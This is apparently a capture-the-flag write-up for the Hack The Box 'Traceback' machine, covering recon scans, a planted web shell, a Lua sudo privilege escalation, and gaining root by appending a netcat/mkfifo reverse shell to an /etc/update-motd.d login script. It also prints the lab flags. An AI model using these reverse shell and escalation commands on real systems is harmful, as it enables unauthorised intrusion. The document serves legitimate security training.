First AutoRecon to map the ports/services
kali@kali:~/Documents/hackTheBox/HackTheBox/machines/Traceback$ sudo ~/tools/AutoRecon/autorecon.py --single-target 10.10.10.181
[sudo] password for kali:
[*] Scanning target 10.10.10.181
[*] Running service detection nmap-quick on 10.10.10.181
[*] Running service detection nmap-full-tcp on 10.10.10.181
[*] Running service detection nmap-top-20-udp on 10.10.10.181
[*] Service detection nmap-quick on 10.10.10.181 finished successfully in 24 seconds
[*] Found ssh on tcp/22 on target 10.10.10.181
[*] Found http on tcp/80 on target 10.10.10.181
[*] Running task tcp/22/sslscan on 10.10.10.181
[*] Running task tcp/22/nmap-ssh on 10.10.10.181
[*] Running task tcp/80/sslscan on 10.10.10.181
[*] Running task tcp/80/nmap-http on 10.10.10.181
[*] Running task tcp/80/curl-index on 10.10.10.181
[*] Running task tcp/80/curl-robots on 10.10.10.181
[*] Running task tcp/80/wkhtmltoimage on 10.10.10.181
[*] Running task tcp/80/whatweb on 10.10.10.181
[*] Task tcp/22/sslscan on 10.10.10.181 finished successfully in less than a second
[*] Task tcp/80/sslscan on 10.10.10.181 finished successfully in less than a second
[*] Task tcp/80/wkhtmltoimage on 10.10.10.181 finished successfully in less than a second
[*] Running task tcp/80/nikto on 10.10.10.181
[*] Running task tcp/80/gobuster on 10.10.10.181
[*] Task tcp/80/curl-robots on 10.10.10.181 finished successfully in less than a second
[*] Task tcp/80/curl-index on 10.10.10.181 finished successfully in less than a second
[*] Task tcp/80/whatweb on 10.10.10.181 finished successfully in 7 seconds
[*] Task tcp/22/nmap-ssh on 10.10.10.181 finished successfully in 17 seconds
[*] Service detection nmap-top-20-udp on 10.10.10.181 finished successfully in 48 seconds
[*] [09:26:06] - There are 4 tasks still running on 10.10.10.181
[*] Task tcp/80/nmap-http on 10.10.10.181 finished successfully in 40 seconds
[*] Service detection nmap-full-tcp on 10.10.10.181 finished successfully in 1 minute, 40 seconds
[*] Task tcp/80/gobuster on 10.10.10.181 finished successfully in 6 minutes, 19 seconds
[*] [09:32:06] - There is 1 task still running on 10.10.10.181
[*] [09:33:06] - There is 1 task still running on 10.10.10.181
[*] Task tcp/80/nikto on 10.10.10.181 finished successfully in 8 minutes, 27 seconds
[*] Finished scanning target 10.10.10.181 in 8 minutes, 52 seconds
[*] Finished scanning all targets in 8 minutes, 52 seconds!
Nmap TCP results
kali@kali:~/Documents/hackTheBox/HackTheBox/machines/Traceback/results/scans$ cat _full_tcp_nmap.txt
# Nmap 7.80 scan initiated Mon Mar 30 09:25:06 2020 as: nmap -vv --reason -Pn -A --osscan-guess --version-all -p- -oN /home/kali/Documents/hackTheBox/HackTheBox/machines/Traceback/results/scans/_full_tcp_nmap.txt -oX /home/kali/Documents/hackTheBox/HackTheBox/machines/Traceback/results/scans/xml/_full_tcp_nmap.xml 10.10.10.181
Nmap scan report for 10.10.10.181
Host is up, received user-set (0.054s latency).
Scanned at 2020-03-30 09:25:20 EDT for 85s
Not shown: 65533 closed ports
Reason: 65533 resets
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDbMNfxYPZGAdOf2OAbwXhXDi43/QOeh5OwK7Me/l15Bej9yfkZwuLhyslDCYIvi4fh/2ZxB0MecNYHM+Sf4xR/CqPgIjQ+NuyAPI/c9iXDDhzJ+HShRR5WIqsqBHwtsQFrcQXcfQFYlC+NFj5ro9wfl2+UvDO6srTUxl+GaaabePYm2u0mlmfwHqlaQaB8HOUb436IdavyTdvpW7LTz4qKASrCTPaawigDymMEQTRYXY4vSemIGMD1JbfpErh0mrFt0Hu12dmL6LrqNmUcbakxOXvZATisHU5TloxqH/p2iWJSwFi/g0YyR2JZnIB65fGTLjIhZsOohtSG7vrPk+cZ
| 256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBD2jCEklOC94CKIBj9Lguh3lmTWDFYq41QkI5AtFSx7x+8uOCGaFTqTwphwmfkwZTHL1pzOMoJTrGAN8T7LA2j0=
| 256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIL4LOW9SgPQeTZubVmd+RsoO3fhSjRSWjps7UtHOc10p
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Help us
Aggressive OS guesses: Linux 3.2 - 4.9 (95%), Linux 3.1 (94%), Linux 3.2 (94%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 3.18 (94%), Linux 3.16 (93%), ASUS RT-N56U WAP (Linux 3.4) (93%), Android 4.1.2 (92%), Adtran 424RG FTTH gateway (92%), Linux 2.6.32 (92%)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=3/30%OT=22%CT=1%CU=42527%PV=Y%DS=2%DC=T%G=Y%TM=5E81F39
OS:5%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=108%TI=Z%CI=Z%TS=A)OPS(O1=M
OS:54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11NW7%
OS:O6=M54DST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN(R=Y%
OS:DF=Y%T=40%W=7210%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=
OS:0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF
OS:=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=
OS:%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%
OS:IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Uptime guess: 36.782 days (since Sat Feb 22 13:40:09 2020)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=257 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 993/tcp)
HOP RTT ADDRESS
1 55.93 ms 10.10.14.1
2 55.98 ms 10.10.10.181
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Mar 30 09:26:45 2020 -- 1 IP address (1 host up) scanned in 99.82 seconds
WhatWeb results:
WhatWeb report for http://10.10.10.181:80
Status : 200 OK
Title : Help us
IP : 10.10.10.181
Country : RESERVED, ZZ
Summary : HTML5, Apache[2.4.29], HTTPServer[Ubuntu Linux][Apache/2.4.29 (Ubuntu)]
Detected Plugins:
[ Apache ]
The Apache HTTP Server Project is an effort to develop and
maintain an open-source HTTP server for modern operating
systems including UNIX and Windows NT. The goal of this
project is to provide a secure, efficient and extensible
server that provides HTTP services in sync with the current
HTTP standards.
Version : 2.4.29 (from HTTP Server Header)
Google Dorks: (3)
Website : http://httpd.apache.org/
[ HTML5 ]
HTML version 5, detected by the doctype declaration
[ HTTPServer ]
HTTP server header string. This plugin also attempts to
identify the operating system from the server header.
OS : Ubuntu Linux
String : Apache/2.4.29 (Ubuntu) (from server string)
HTTP Headers:
HTTP/1.1 200 OK
Date: Mon, 30 Mar 2020 13:27:13 GMT
Server: Apache/2.4.29 (Ubuntu)
Last-Modified: Tue, 27 Aug 2019 11:29:44 GMT
ETag: "459-5911796d5b788-gzip"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 391
Connection: close
Content-Type: text/html
Nikto results
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.181
+ Target Hostname: 10.10.10.181
+ Target Port: 80
+ Start Time: 2020-03-30 09:25:32 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 459, size: 5911796d5b788, mtime: gzip
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7863 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time: 2020-03-30 09:33:57 (GMT-4) (505 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Using dirsearch to enumerate hidden directory
kali@kali:~/Documents/hackTheBox/HackTheBox/machines/Traceback/results/scans$ /home/kali/tools/dirsearch/dirsearch.py -u http://10.10.10.181 -f -E -x 403
_|. _ _ _ _ _ _|_ v0.3.9
(_||| _) (/_(_|| (_| )
Extensions: php, asp, aspx, jsp, js, html, do, action | HTTP method: get | Threads: 10 | Wordlist size: 44994
Error Log: /home/kali/tools/dirsearch/logs/errors-20-03-30_09-41-40.log
Target: http://10.10.10.181
[09:41:40] Starting:
[09:44:17] 200 - 1KB - /index.html
Task Completed
Opening the web site on the port 80 we see the message
in the page source code there is this comment:
<!--Some of the best web shells that you might need ;)-->
Googling the phrase we get a git repository (from the VM creator) hosting a list of webshells:
https://github.com/Xh4H/Web-Shells
trying the possible vaules we found a running webshell:
http://10.10.10.181/smevk.php
Exploitation
To be more confortable, we open a reverse shell from the webshell to the attacking system
kali@kali:~/Documents/hackTheBox/HackTheBox/machines/Traceback$ nc -lvp 6666
listening on [any] 6666 ...
10.10.10.181: inverse host lookup failed: Host name lookup failure
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.181] 34488
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
webadmin@traceback:/var$ id
id
uid=1000(webadmin) gid=1000(webadmin) groups=1000(webadmin),24(cdrom),30(dip),46(plugdev),111(lpadmin),112(sambashare)
webadmin@traceback:/var$ pwd
pwd
/var
webadmin@traceback:/var$ cd /home
cd /home
webadmin@traceback:/home$ ls
ls
sysadmin webadmin
webadmin@traceback:/home$ cd webadmin
cd webadmin
webadmin@traceback:/home/webadmin$ ls
ls
note.txt
webadmin@traceback:/home/webadmin$ ls -la
ls -la
total 44
drwxr-x--- 5 webadmin sysadmin 4096 Mar 16 04:03 .
drwxr-xr-x 4 root root 4096 Aug 25 2019 ..
-rw------- 1 webadmin webadmin 105 Mar 16 04:03 .bash_history
-rw-r--r-- 1 webadmin webadmin 220 Aug 23 2019 .bash_logout
-rw-r--r-- 1 webadmin webadmin 3771 Aug 23 2019 .bashrc
drwx------ 2 webadmin webadmin 4096 Aug 23 2019 .cache
drwxrwxr-x 3 webadmin webadmin 4096 Aug 24 2019 .local
-rw-rw-r-- 1 webadmin webadmin 1 Aug 25 2019 .luvit_history
-rw-r--r-- 1 webadmin webadmin 807 Aug 23 2019 .profile
drwxrwxr-x 2 webadmin webadmin 4096 Feb 27 06:29 .ssh
-rw-rw-r-- 1 sysadmin sysadmin 122 Mar 16 03:53 note.txt
webadmin@traceback:/home/webadmin$ cat note.txt
cat note.txt
- sysadmin -
I have left a tool to practice Lua.
I'm sure you know where to find it.
Contact me if you have any question.
$ cat .bash_history
ls -la
sudo -l
nano privesc.lua
sudo -u sysadmin /home/sysadmin/luvit privesc.lua
rm privesc.lua
logout
So there is the command /home/sysadmin/luvit we can use to do a privilege escalation, based on the bash history file.
We create a very simple lua script, and we try to exec it
$ cd /var/tmp
$ echo "os.execute ('/bin/bash -i');" > test.lua
$ sudo -u sysadmin /home/sysadmin/luvit ./test.lua
bash: cannot set terminal process group (519): Inappropriate ioctl for device
bash: no job control in this shell
sysadmin@traceback:/var/tmp$ id
id
uid=1001(sysadmin) gid=1001(sysadmin) groups=1001(sysadmin)
sysadmin@traceback:/var/tmp$ cd /home/sysadmin
cd /home/sysadmin
sysadmin@traceback:~$ cat user.txt
cat user.txt
aa76779051ea2de8b14689474af87d49
The user flag is aa76779051ea2de8b14689474af87d49
For stability I will put a public key in the authorized_keys og the sysadmin user.
now, we use pspy to identify what is running on the system, to understand if there is a way to become root...
2020/03/29 15:21:01 CMD: UID=0 PID=2935 | /bin/sh -c sleep 30 ; /bin/cp /var/backups/.update-motd.d/* /etc/update-motd.d/
2020/03/29 15:21:01 CMD: UID=??? PID=2934 | ???
2020/03/29 15:21:01 CMD: UID=??? PID=2933 | ???
2020/03/29 15:21:01 CMD: UID=0 PID=2932 | /usr/sbin/CRON -f
2020/03/29 15:21:31 CMD: UID=0 PID=2943 | /bin/cp /var/backups/.update-motd.d/00-header /var/backups/.update-motd.d/10-help-text /var/backups/.update-motd.d/50-motd-news /var/backups/.update-motd.d/80-esm /var/backups/.update-motd.d/91-release-upgrade /etc/update-motd.d/
2020/03/29 15:21:36 CMD: UID=0 PID=2944 |
2020/03/29 15:22:01 CMD: UID=0 PID=2950 | /usr/sbin/CRON -f
2020/03/29 15:22:01 CMD: UID=0 PID=2949 | /usr/sbin/CRON -f
2020/03/29 15:22:01 CMD: UID=0 PID=2948 | /usr/sbin/CRON -f
2020/03/29 15:22:01 CMD: UID=0 PID=2953 | sleep 30
2020/03/29 15:22:31 CMD: UID=0 PID=2954 | /bin/cp /var/backups/.update-motd.d/00-header /var/backups/.update-motd.d/10-help-text /var/backups/.update-motd.d/50-motd-news /var/backups/.update-motd.d/80-esm /var/backups/.update-motd.d/91-release-upgrade /etc/update-motd.d/
every 30 seconds the /etc/update-motd.d files are replaced. Then we check the /etc/update-motd.d permissions
sysadmin@traceback:/etc/update-motd.d$ ls -la
ls -la
total 32
drwxr-xr-x 2 root sysadmin 4096 Aug 27 2019 .
drwxr-xr-x 80 root root 4096 Mar 16 03:55 ..
-rwxrwxr-x 1 root sysadmin 981 Mar 30 09:06 00-header
-rwxrwxr-x 1 root sysadmin 982 Mar 30 09:06 10-help-text
-rwxrwxr-x 1 root sysadmin 4264 Mar 30 09:06 50-motd-news
-rwxrwxr-x 1 root sysadmin 604 Mar 30 09:06 80-esm
-rwxrwxr-x 1 root sysadmin 299 Mar 30 09:06 91-release-upgrade
The files are writable by the user sysadmin. These files are, usually, run by the system when an user logs in the system. Let's check what happens when a user connects to the system using ssh
2020/03/29 15:16:10 CMD: UID=106 PID=2862 | sshd: [net]
2020/03/29 15:16:10 CMD: UID=0 PID=2865 | /bin/sh /etc/update-motd.d/00-header
2020/03/29 15:16:10 CMD: UID=0 PID=2864 | run-parts --lsbsysinit /etc/update-motd.d
2020/03/29 15:16:10 CMD: UID=0 PID=2863 | sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new
2020/03/29 15:16:10 CMD: UID=0 PID=2871 |
2020/03/29 15:16:10 CMD: UID=??? PID=2870 | ???
2020/03/29 15:16:10 CMD: UID=??? PID=2869 | ???
2020/03/29 15:16:10 CMD: UID=0 PID=2867 | /bin/sh /etc/update-motd.d/50-motd-news
2020/03/29 15:16:10 CMD: UID=0 PID=2872 | /bin/sh /etc/update-motd.d/80-esm
2020/03/29 15:16:10 CMD: UID=0 PID=2873 | /usr/bin/python3 -Es /usr/bin/lsb_release -cs
2020/03/29 15:16:10 CMD: UID=0 PID=2874 | /usr/bin/python3 -Es /usr/bin/lsb_release -ds
2020/03/29 15:16:10 CMD: UID=0 PID=2878 | cut -d -f4
2020/03/29 15:16:10 CMD: UID=0 PID=2877 | /usr/bin/python3 -Es /usr/bin/lsb_release -sd
2020/03/29 15:16:10 CMD: UID=0 PID=2876 | /bin/sh /etc/update-motd.d/91-release-upgrade
2020/03/29 15:16:10 CMD: UID=0 PID=2875 | /bin/sh /etc/update-motd.d/91-release-upgrade
2020/03/29 15:16:10 CMD: UID=1001 PID=2883 | sshd: sysadmin
2020/03/29 15:16:10 CMD: UID=??? PID=2885 | ???
2020/03/29 15:16:10 CMD: UID=1001 PID=2884 | -sh
As expected, the files are executed (with root privileges) when a user log in using ssh.
The idea is to inject a reverse shell inside one of the /etc/update-motd.d/ files, to have a reverse shell as root.
On the attacker machine we use a terminal to open a listening nc. On the victim side we run the command:
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.3 9898 >/tmp/f" >> ./00-header
then we connect using ssh with the key we added before. A reverse shell is opened, as root.
kali@kali:~/.ssh$ ssh -i key_htb sysadmin@10.10.10.181
#################################
-------- OWNED BY XH4H ---------
- I guess stuff could have been configured better ^^ -
#################################
dopo qualche istante arriva la reverse shell
kali@kali:~/.ssh$ nc -lvp 9898
listening on [any] 9898 ...
10.10.10.181: inverse host lookup failed: Host name lookup failure
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.181] 48744
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# ifconfig
ens33: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.10.10.181 netmask 255.255.255.0 broadcast 10.10.10.255
inet6 fe80::250:56ff:feb9:1356 prefixlen 64 scopeid 0x20<link>
inet6 dead:beef::250:56ff:feb9:1356 prefixlen 64 scopeid 0x0<global>
ether 00:50:56:b9:13:56 txqueuelen 1000 (Ethernet)
RX packets 76972 bytes 13386308 (13.3 MB)
RX errors 0 dropped 51 overruns 0 frame 0
TX packets 67119 bytes 27948314 (27.9 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 7505 bytes 594079 (594.0 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 7505 bytes 594079 (594.0 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
# pwd
/
# cd root
# ls
root.txt
# cat root.txt
0d18b70988b76aadaaa4c585b06e4096
#
The root flag is 0d18b70988b76aadaaa4c585b06e4096